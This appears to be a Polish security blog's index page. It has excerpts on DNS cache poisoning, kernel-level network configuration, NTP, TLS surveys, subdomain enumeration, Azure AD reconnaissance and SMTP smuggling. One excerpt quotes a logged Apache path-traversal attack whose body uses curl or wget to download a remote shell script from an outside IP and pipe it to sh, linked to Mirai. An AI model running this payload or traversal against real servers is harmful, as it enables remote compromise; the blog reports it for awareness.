Ó

smego lipca 2008 roku Dan Kaminsky przedstawił poważne luki w implementacjach zabezpieczeń systemu nazw domenowych (ang. Domian Name System, DNS). Obejmują one luki wykryte w serwerach DNS BIND 8 i 9 przed wersjami 9.5.0-P1, 9.4.2-P1, oraz 9.3.5-P1; (2) Microsoft DNS w Windows 2000 SP4, XP SP2 i SP3, oraz Microsoft Server 2003 SP1 i SP2, a także prawdopodobnie w innych implementacjach, które pozwalają na sfałszowanie ruchu DNS techniką zatruwania DNS poprzez atak urodzinowy używający przekazywanych do rozpatrzenia rekordów in-bailiwick.
[ czytaj całość… ]

A

gdybym Ci powiedział, że Linux nie potrzebuje żadnego zewnętrznego klienta DHCP, menedżera sieciowego ani innego narzędzia do konfiguracji sieci, aby skutecznie przeprowadzić proces konfiguracji jednego interfejsu sieciowego na dowolnym serwerze? Wystarczy tylko jądro i bootloader. W dodatku metoda ta jest kompatybilna wstecz aż do wersji Linuksa 2.0 z 1996 roku. Mowa tutaj o mechanizmie nfsroot, który pierwotnie został stworzony dla stacji bezdyskowych, a zawarty w nim parametr jądra ip= to przydatne narzędzie, które może w różnych sytuacjach pomóc skonfigurować sieć bez dodatkowego oprogramowania. Jeśli dobrze się wczytamy to dokumentacja nfsroot definiuje składnię parametru ip=, który poinstruuje jądro, jak skonfigurować wybrany interfejs sieciowy podczas startu systemu. Choć nazwa sugeruje powiązanie z NFS (ang. Network File System), mechanizm ten działa niezależnie od tego, czy ostatecznie zamontujemy system plików przez sieć. Jego składnia jest bardzo prosta:

ip=[klient]:[server]:[brama]:[maska]:[host]:[interfejs]:[autokonf]:[dns0]:[dns1]:[ntp0]

Gdzie:

• [ klient – to adres IP jaki chcemy przypisać interfejsowi sieciowemu.
• [ server – adres IP serwera NFS (możemy pominąć, jeśli nie montujemy systemu plików).
• [ brama – adres IP bramy sieciowej odpowiedzialnej za dostęp do sieci / internetu.
• [ maska – maska sieciowa definiująca do jakiej podsieci należy adres IP z pola klient.
• [ host – nazwa hosta / serwera.
• [ interfejs – nazwa interfejsu sieciowego, dla którego chcemy skonfigurować adresację sieciową.
• [ autokonf – określa jakim protokołem skonfigurować interfejs: dhcp, bootp, rarp lub off (statycznie).
• [ dns0 – adres pierwszego serwera DNS (działa tylko serwerem NFS), który pojawi się w /proc/net/pnp.
• [ dns1 – adresu drugiego serwera DNS (działa tylko serwerem NFS), który pojawi się w /proc/net/pnp.
• [ ntp0 – adres serwera NTP, który pojawi się w /proc/net/ipconfig/ntp_servers.

Przykłady:

GRUB_CMDLINE_LINUX="ip=192.168.254.2::192.168.254.1:255.255.255.0:darkstar:enp0s8:off:::"

Ustawi na interfejsie enp0s8 statyczny adres IP: 192.168.254.2/24, którego bramą sieciową jest: 192.168.254.1. Jeśli nie podamy nazwy interfejsu sieciowego zostanie wybrany pierwszy interfejs w systemie.

GRUB_CMDLINE_LINUX="ip=:::::enp0s8:dhcp:::"

Skonfiguruje interfejs enp0s8 za pomocą protokołu DHCP. Jeśli nie podamy nazwy interfejsu sieciowego zostanie wybrany pierwszy interfejs w systemie. Natomiast jeśli posiadamy tylko jeden interfejs to sprawa uproszcza się do krótkiego wpisu:

GRUB_CMDLINE_LINUX="ip=dhcp"

Fraza GRUB_CMDLINE_LINUX w powyższych przykładach pojawia się nie bez powodu, ponieważ zastosowanie tej metody w systemie (np. Debian / Ubuntu) wymaga zmodyfikowania parametrów startowych w programie rozruchowym GRUB. Poprzez edycję pliku: /etc/default/grub i dopisanie do linii GRUB_CMDLINE_LINUX odpowiednio dobranego parametru ip= aktywujemy mechanizm przy starcie systemu. Po edycji i zapisie w/w pliku wymagana jest aktualizacja konfiguracji GRUB:

sudo update-grub

Należy tylko pamiętać, że sterownik karty sieciowej musi być wkompilowany w jądro systemu lub dostępny w obrazie initrd/initramfs.

Więcej informacji: Setting a Static IP Address Using the Kernel Command Line, Kernel-only network configuration on Linux

K

orzystając z protokołu NTP (ang. Network Time Protocol) możemy mieć pewność, że nasze serwery synchronizują swój czas z wyspecjalizowanymi serwerami czasu opartymi na zegarach atomowych (w zależności od poziomu stratum). Utrzymanie precyzyjnego i aktualnego czasu na serwerach (i ogólnie urządzeniach biorących udział w komunikacji) nie jest tylko kwestią możliwości odpowiedzi na pytanie: „- która godzina?”. Poprawny czas na różnego rodzaju urządzeniach to krytyczny element stabilności, bezpieczeństwa i spójności danych. Jeśli zegar serwera znacząco odbiega od rzeczywistości to wiele usług używających czasu w swoich mechanizmach może zacząć działać niepoprawnie. Na przykład duże różnice w postaci dni, miesięcy i lat mogą powodować uznawanie certyfikatów SSL/TLS za nieważne (wydane w przeszłości lub przyszłości). Mniejsze różnice mieszczące się w oknie od 2 do 5 minut mogą powodować problemy z kodami uwierzytelniającymi dla OTP, 2FA, czy Kerberos – bo różnica czasu między klientem, a serwerem spowoduje ich odrzucenie.
[ czytaj całość… ]

C

loudflare udostępnił publicznie usługę Radar, w której są zawarte dane o rankingu domen: Domian Rankings Worldwide. Tutaj należy mieć świadomość, że dane pochodzą z ich publicznego serwera DNS, z którego nie koniecznie musi korzystać cały internet. Niemniej jednak jest to dobra próbka, aby przeprowadzić eksperyment podobny do analiz nagłówka HTTP. W pliku pobranym 28.09.2024 znalazło się 1.008.856 domen. Finalnie udało połączyć się z 750.892 domenami w celu pobrania informacji o ich certyfikacie TLS. Aby szybko pozyskać te dane został zmodyfikowany kod skryptu httpsrvreaper na bazie którego powstał sslsrvreaper. Jest on na tyle prosty, że czyta z pliku tekstowego domains.txt adresy, z jakimi ma się połączyć i zapisać ich metadane TLS w formacie JSON, na przykład:
[ czytaj całość… ]

Nie musimy ściągać wyrafinowanych narzędzi do enumeracji subdomen wybranej domeny. Powinna wystarczyć nam dobra lista oraz dwa narzędzia, które bardzo często znaleźć zainstalowane w systemie Linux: dig oraz xargs:

$ wc -l subdomians.txt
100 subdomians.txt

$ time cat subdomians.txt | xargs -P0 -I subdomain dig +noall subdomain.nfsec.pl +answer
www.nfsec.pl.		3600	IN	CNAME	nfsec.pl.
nfsec.pl.		3600	IN	A	146.59.92.70
ns1.nfsec.pl.		3600	IN	A	146.59.92.70
ns2.nfsec.pl.		3600	IN	A	213.251.188.141
ns3.nfsec.pl.		3600	IN	A	46.105.206.200
ns4.nfsec.pl.		3600	IN	A	46.105.207.200

real	0m0.390s
user	0m0.764s
sys	0m0.599s

If max-procs (-P) is 0, xargs will run as many processes as possible at a time.

Więcej informacji: Hostname bruteforcing on the cheap

W

sieci wciąż krążą automaty szukające podatnych na path traversal oraz zdalne wykonanie poleceń serwerów HTTP Apache. Na przykład z dwóch chińskich adresów IP: 117.184.158.27 oraz 124.165.198.25 możemy zostać uraczeni następującym żądaniem typu POST:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
accept: */*
host: 1.2.3.4:443
upgrade-insecure-requests: 1
user-agent: Custom-AsyncHttpClient
content-length: 109
content-type: text/plain
x-http-version: 1.1
x-remote-port: 52454
x-forwarded-for: 124.165.198.25
x-untrusted: 1
x-forwarded-proto: https

X=$(curl http://93.123.39.27/jVA.sh || wget http://93.123.39.27/jVA.sh -O-); \
echo \"$X\" | sh -s apache.selfrep

Bułgarski adres IP, na którym jest hostowany ładunek, jest również związany z botnentem Mirai:
[ czytaj całość… ]

W

internecie możemy być właścicielem wielu domen, a w ramach nich rejestrować wiele subdomen. Nasze (sub)domeny mogą być używane do bardzo wielu zastosowań: obsługi strony (aplikacji) internetowej, poczty, serwera plików, serwera DNS, ochrony marki, działalności w wielu krajach itd. Wiele z tych (sub)domen będzie uniwersalna – zawierając pod sobą większość z wymienionych usług, a jeszcze większa ilość (licząc z subdomenami) będzie ukierunkowana na świadczenie konkretnej usługi. Jeśli nasza (sub)domena nie jest przeznaczona do obsługi poczty e-mail, niezależnie od tego, czy jest to poczta przychodząca (chcemy ją odbierać), czy wychodząca (chcemy ją wysyłać), również musimy zadbać o jej prawidłową konfigurację, aby zapobiec wykorzystywaniu tej (sub)domeny do nieuczciwych działań w internecie (czyt. podszywaniu się i wysyłaniu phishingu).
[ czytaj całość… ]

O

d początków informatyki dokładne wykrywanie typów plików miało kluczowe znaczenie przy określaniu sposobu przetwarzania plików. System Linux wyposażony jest w bibliotekę libmagic i narzędzie file, które od ponad 50 lat stanowią de facto standard identyfikacji typów plików. W dzisiejszych czasach przeglądarki internetowe, edytory kodu i niezliczone inne oprogramowanie opiera się na wykrywaniu typu plików w celu podjęcia decyzji o poprawnym przetworzeniu i wyświetleniu zawartości plików. Na przykład nowoczesne edytory kodu wykorzystują wykrywanie typu plików, aby wybrać schemat kolorowania składni, który ma zostać użyty, gdy programista zacznie pisać kod w danym języku.
[ czytaj całość… ]

R

ozwój gotowych usług umożliwia wielu firmom przeniesienie całości lub części swojej infrastruktury, która była wcześniej ukryta w dedykowanym centrum danych do środowisk chmurowych. Oznacza to, że część informacji o usługach danej firmy można obecnie odkryć poprzez rekonesans w sposób, który w przeszłości nie zawsze był taki łatwy lub możliwy np. poprzez używanie widoków dla wewnętrznych i zewnętrznych stref DNS w celu ukrycia wewnętrznych domen firmowych. Istnieje wiele technik, które mogą przedstawić nam jakie domeny należą do konkretnej firmy np. rWHOIS, DNS, TLS itd., jednak wraz z pojawieniem się środowisk chmurowych dane te można pozyskać w dodatkowy sposób. Na dzień dzisiejszy firma Microsoft nadal dominuje w świecie IT dla przedsiębiorstw, a korzeniem każdej, większej firmy jest „drzewo” Active Directory, które służy do zarządzania grupami, użytkownikami, politykami i domenami w środowisku IT. Teraz, gdy coraz więcej wewnętrznych usług Active Directory zaczęło być przenoszonych na platformę chmurową Azure firmy Microsoft, badacze bezpieczeństwa mogą wykorzystywać te usługi do odkrywania domen przypisanych do konkretnej organizacji z bardzo wysokim poziomem pewności, co do informacji zwrotnej i bez polegania na (czasami) niespójnych danych z serwisów zewnętrznych. Nestori Syynimaa w tym celu stworzył moduł AADInternals PowerShell do przeprowadzania prac administracyjnych na usłudze Azure AD oraz Office 365. Jeśli nie potrafimy posługiwać się interpreterem poleceń PowerShell nie musimy się martwić, ponieważ twórca AADInternals udostępnił również internetowe narzędzie „OSINT„, aby rekonesans domen był znacznie łatwiejszy i bardziej dostępny dla większego grona użytkowników. Umożliwia ono uzyskanie ogólnodostępnych informacji na temat określonego najemcy (ang. tenant) usługi za pomocą interfejsów API Azure. Szczegóły są zwracane tylko dla pierwszych 20 domen. Jeśli trafimy na więcej pozycji niestety musimy użyć modułu PowerShell, aby uzyskać pełne informacje. Dla przykładu działania możemy odpytać się o takie domeny jak: ebay.com, bbc.co.uk lub olx.com.

Więcej informacji: Just looking: Azure Active Directory reconnaissance as an outsider

B

adacze z SEC Consult, a dokładniej Timo Longin – znany ze swoich ataków na protokół DNS opisał informację o nowej technice ataku o nazwie SMTP Smuggling, która może umożliwiać wysyłanie fałszywych wiadomości e-mail z pominięciem mechanizmów uwierzytelniania. Technika ta wykorzystuje protokół SMTP (ang, Simple Mail Transfer Protocol), w którym atakujący może wykorzystać różnice w sposobie, w jaki wychodzące i przychodzące serwery SMTP interpretują sekwencję wskazującą koniec danych w wiadomości e-mail. Co ciekawe bardzo podobną technikę o nazwie MX Injection opisał Vicente Aquilera Diaz w 2006 roku. Mimo, że jest to znany, długotrwały i dobrze udokumentowany problem, kilka powszechnie używanych serwisów i serwerów świadczących usługi e-mail okazało się podatnych na przeprowadzenie tego ataku.
[ czytaj całość… ]